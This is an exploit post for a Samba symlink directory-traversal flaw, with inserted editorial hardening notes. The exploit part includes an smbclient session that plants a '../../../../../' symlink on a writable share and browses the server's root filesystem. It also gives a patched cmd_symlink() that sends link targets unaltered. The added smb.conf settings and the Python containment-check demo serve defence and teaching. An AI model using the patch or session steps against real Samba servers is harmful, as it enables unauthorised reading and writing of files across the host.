Samba Remote Zero-Day Exploit Feb


http://www.youtube.com/watch?v=NN50RtZ2N74

Samba Remote Directory Traversal
logic fuckup discovered & exploited by Kingcope in 2010

It seems there was a quite similar bug found back in 2004:
http://marc.info/?l=bugtraq&m=109658688505723&w=2

A remote attacker can read, list and retrieve nearly all files on the system remotely.
Required is a valid Samba account for a share which is writeable, OR
a writeable share which is configured as a guest-account share;
in that case this is a preauth exploit.

The attacker can write for example into /tmp or where the account
he is connecting with has access to (/home/<user> etc).
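The advisory names no configuration settings, so the following smb.conf fragment is an editor's addition, not part of the original post. The share name and path are assumptions. It shows the two server-side parameters that decide whether the symlink trick works: the client needs the UNIX CIFS extensions (global `unix extensions`) to create a symlink with an arbitrary target, and smbd must be willing to follow a symlink that leaves the share root (per-share `wide links`). Samba 3.4 releases of the time allowed both by default.

```ini
[global]
   workgroup = WORKGROUP
   ; Lets smbclient's "symlink" command create UNIX symlinks with any target.
   ; Setting this to "no" removes the client's ability to plant the link at all.
   unix extensions = yes

[testmount]
   ; Assumed path for the writable share used in the session above.
   path = /srv/samba/testmount
   writeable = yes
   guest ok = no
   ; Vulnerable combination (old default): smbd follows "foobar -> ../../../../../"
   ; straight out of the share root.
   ;wide links = yes
   ; Hardened: smbd refuses to follow a symlink whose resolved target lies
   ; outside the share root, so "cd foobar" fails instead of landing in /.
   wide links = no
   ; Stricter still: never follow symlinks inside this share at all.
   ;follow symlinks = no
```

With `wide links = no` a user can still create the symlink on a writable share, but listing or reading through it is refused; with `unix extensions = no` the `symlink` command itself is rejected, as the exploit's own `SERVER_HAS_UNIX_CIFS` check anticipates.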

Exploit session (using the patched smbclient exploit):

smb is a samba user created.

root@nr-pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb //<host>/testmount/
Enter smb's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: /> ls
. D 0 Wed Feb 3 14:27:03 2010
.. D 0 Wed Feb 3 14:19:13 2010
test D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010

45503 blocks of size 2097152. 24437 blocks available
smb: /> symlink ../../../../../ foobar
smb: /> ls
. D 0 Wed Feb 3 14:27:47 2010
.. D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010
foobar D 0 Mon Feb 1 20:29:12 2010

45503 blocks of size 2097152. 24437 blocks available
smb: /> ls ..
NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing /..

45503 blocks of size 2097152. 24437 blocks available
smb: /> cd foobar
smb: /foobar/> ls
. D 0 Mon Feb 1 20:29:12 2010
.. D 0 Mon Feb 1 20:29:12 2010
initrd.img.old 7646184 Mon Jan 18 13:15:48 2010
boot.ini 18832 Mon Feb 1 20:29:12 2010
home D 0 Mon Jan 18 13:08:24 2010
initrd.img 8007195 Thu Jan 21 21:51:26 2010
.cache DH 0 Sat Jan 23 14:19:08 2010
opt D 0 Sat Jan 30 11:39:59 2010
lib D 0 Thu Jan 21 21:13:01 2010
usr D 0 Sun Jan 31 22:08:11 2010
.libs DH 0 Thu Jan 21 12:30:48 2010
var D 0 Sun Jan 31 21:14:42 2010
bin D 0 Mon Jan 18 13:31:14 2010
selinux D 0 Tue Oct 20 01:05:22 2009
root D 0 Tue Feb 2 19:43:59 2010
vmlinuz.old 3890400 Fri Oct 16 20:03:49 2009
vmlinuz 3890560 Thu Dec 10 20:33:26 2009
etc D 0 Wed Feb 3 14:17:29 2010
srv D 0 Sat Jan 23 20:17:29 2010
proc DR 0 Wed Feb 3 14:10:41 2010
dev D 0 Wed Feb 3 14:11:02 2010
boot D 0 Thu Jan 21 21:51:26 2010
mnt D 0 Sat Jan 23 19:26:23 2010
media D 0 Fri Jan 29 08:32:31 2010
cdrom D 0 Mon Jan 18 12:40:11 2010
tmp D 0 Wed Feb 3 14:26:20 2010
sbin D 0 Thu Jan 21 21:50:58 2010
lost+found D 0 Mon Jan 18 12:39:57 2010
sys D 0 Wed Feb 3 14:10:41 2010

45503 blocks of size 2097152. 24437 blocks available
smb: /foobar/>

put and get work in the folder now!
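The session above shows the core of the bug: a literal `..` in the client path is rejected (`NT_STATUS_OBJECT_PATH_SYNTAX_BAD`), but a symlink whose target climbs above the share root is followed without inspection. The following Python script is an added example by the editor (not Kingcope's code, not Samba code) that reproduces that contrast on a throwaway directory tree, and pairs the naive resolver with one that canonicalises the path with `realpath()` and refuses anything outside the share root, which is what a `wide links = no` style check amounts to. The directory layout, the secret file and the names `naive_resolve`, `safe_resolve`, `build_share`, `PathSyntaxBad` and `OutsideShare` are this example's own constructions.

```python
"""Symlink traversal out of a share root, and the containment check that stops it.

Added example, not part of the advisory. The 'share' is a temp directory, the
'system file' lives one level above it, and the attacker's step is the same
idea as 'symlink ../../../../../ foobar': a relative link target that climbs out.
"""
import os
import tempfile


class PathSyntaxBad(Exception):
    """Client path contained a literal '..' component (the syntactic check)."""


class OutsideShare(Exception):
    """Canonical path resolved outside the share root (the containment check)."""


def _client_parts(client_path):
    return [p for p in client_path.split("/") if p]


def naive_resolve(share_root, client_path):
    """Vulnerable: rejects a literal '..' but never looks at symlink targets."""
    parts = _client_parts(client_path)
    if ".." in parts:
        raise PathSyntaxBad(client_path)
    return os.path.join(share_root, *parts)


def safe_resolve(share_root, client_path):
    """Hardened: canonicalise, then require the result to stay under the root."""
    parts = _client_parts(client_path)
    if ".." in parts:
        raise PathSyntaxBad(client_path)
    root = os.path.realpath(share_root)
    candidate = os.path.realpath(os.path.join(root, *parts))
    if candidate != root and not candidate.startswith(root + os.sep):
        raise OutsideShare(candidate)
    return candidate


def build_share(base):
    """Constructed layout: base/outside/secret.txt is the 'system file';
    base/srv/share is the writable share with the attacker's symlink planted."""
    share = os.path.join(base, "srv", "share")
    os.makedirs(os.path.join(share, "test"))
    os.makedirs(os.path.join(base, "outside"))
    with open(os.path.join(base, "outside", "secret.txt"), "w") as f:
        f.write("only readable outside the share\n")
    # Relative target, resolved from the symlink's own directory: base/srv/share -> base
    os.symlink("../../outside", os.path.join(share, "foobar"))
    return share


def demo():
    """Run both resolvers against the constructed share; returns a results dict."""
    with tempfile.TemporaryDirectory() as tmp:
        share = build_share(tmp)
        results = {}
        # 'ls ..' style request: both resolvers reject it at the syntax level.
        for name, fn in (("naive", naive_resolve), ("safe", safe_resolve)):
            try:
                fn(share, "/..")
                results[name + "_dotdot"] = "allowed"
            except PathSyntaxBad:
                results[name + "_dotdot"] = "syntax_bad"
        # 'cd foobar; ls': the naive resolver happily lists the directory outside.
        results["naive_symlink"] = sorted(os.listdir(naive_resolve(share, "/foobar")))
        try:
            safe_resolve(share, "/foobar")
            results["safe_symlink"] = "followed"
        except OutsideShare:
            results["safe_symlink"] = "refused"
        # A symlink that stays inside the share is still usable under the safe resolver.
        os.symlink("test", os.path.join(share, "inside"))
        results["safe_inside"] = os.path.basename(safe_resolve(share, "/inside"))
        return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the `realpath()` step is that the check happens on the resolved filesystem path, not on the string the client sent; a prefix comparison on the canonical path is also what defeats a link planted in a subdirectory or a chain of links, which a per-component `..` filter never sees.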

List open shares (this is normal operation mode, not an exploit):

root@nr-pentest:~/Downloads/samba-3.4.5/source3/client# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L //<host>/
Enter root's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

Sharename Type Comment
--------- ---- -------
testmount Disk // < this share is writable and exploitable!!
print$ Disk Printer Drivers
IPC$ IPC IPC Service (nr-pentest server (Samba, Ubuntu))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

Server Comment
--------- -------
NR-PENTEST nr-pentest server (Samba, Ubuntu)

Workgroup Master
--------- -------
WORKGROUP NR-PENTEST

smbclient patch (exploit):

samba-3.4.5/source3/client/client.c
/****************************************************************************
 UNIX symlink.
****************************************************************************/

static int cmd_symlink(void)
{
	TALLOC_CTX *ctx = talloc_tos();
	char *oldname = NULL;
	char *newname = NULL;
	char *buf = NULL;
	char *buf2 = NULL;
	char *targetname = NULL;
	struct cli_state *targetcli;

	if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
	    !next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
		d_printf("symlink <oldname> <newname>\n");
		return 1;
	}
	/* Link target is sent verbatim, so a relative "../../../../../"
	   reaches the server unchanged instead of being glued onto the
	   current share directory. */
	oldname = talloc_asprintf(ctx,
			"%s", // << HERE modified
			buf);
	if (!oldname) {
		return 1;
	}
	newname = talloc_asprintf(ctx,
			"%s", // << HERE modified
			buf2);
	if (!newname) {
		return 1;
	}
	/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
	oldname = talloc_asprintf(ctx,
			"%s%s", // < modified (see above)
			client_get_cur_dir(), // < removed (see above)
			buf);
	if (!oldname) {
		return 1;
	}
	newname = talloc_asprintf(ctx,
			"%s%s", // < modified (see above)
			client_get_cur_dir(), // < removed (see above)
			buf2);
	if (!newname) {
		return 1;
	}
	----------------------------------------------*/

	if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
		d_printf("link %s: %s\n", oldname, cli_errstr(cli));
		return 1;
	}

	/* The server must advertise the UNIX CIFS extensions for the
	   symlink call to exist at all. */
	if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
		d_printf("Server doesn't support UNIX CIFS calls.\n");
		return 1;
	}

	if (!cli_unix_symlink(targetcli, targetname, newname)) {
		d_printf("%s symlinking files (%s -> %s)\n",
			cli_errstr(targetcli), newname, targetname);
		return 1;
	}

	return 0;
}

// Cheers,
// kcope
